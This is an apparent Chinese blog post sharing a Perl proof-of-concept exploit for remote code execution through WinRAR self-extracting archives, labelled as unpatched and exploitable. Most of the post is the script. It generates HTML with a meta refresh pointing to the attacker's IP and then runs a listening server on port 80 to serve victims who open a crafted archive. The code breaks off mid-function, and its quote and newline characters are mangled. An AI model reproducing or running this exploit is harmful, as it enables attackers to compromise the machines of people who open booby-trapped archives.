WinRAR 压缩工具可执行远程代码漏洞poc

  • A+
所属分类:颓废's Blog
摘要

未修复可利用

未修复可利用

PoC: Exploit Code #!/usr/bin/perl # Title : WinRaR SFX – Remote Code Execution # Tested on Windows 7 / Server 2008 / Server 2003 # # l0s4r.com  use strict; use warnings; use IO::Socket; use MIME::Base64 qw( decode_base64 ); use Socket ‘inet_ntoa’; use Sys::Hostname ‘hostname’;  print ” Mohammad Reza Espargham/n/n”; my $ip = inet_ntoa(scalar gethostbyname(hostname() || ‘localhost’));  my $port = 80;  print “Winrar HTML Code/n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip . ‘”></head></html>’.”/n/n” if($port==80); print “Winrar HTML Code/n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip . ‘:’ . $port . ‘”></head></html>’.”/n/n” if($port!=80);  my $server = new IO::Socket::INET( Proto => ‘tcp’, LocalPort => $port, Listen => SOMAXCONN, ReuseAddr => 1) or die “Unable to create server socket”;  # Server loop while(my $client = $server->accept()) { my $client_info; while(<$client>) { last if /^/r/n$/; $client_info .= $_; } incoming($client, $client_info); }  sub incoming { print “/n=== Incoming Request:/n”; my $client = shift; print $c

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: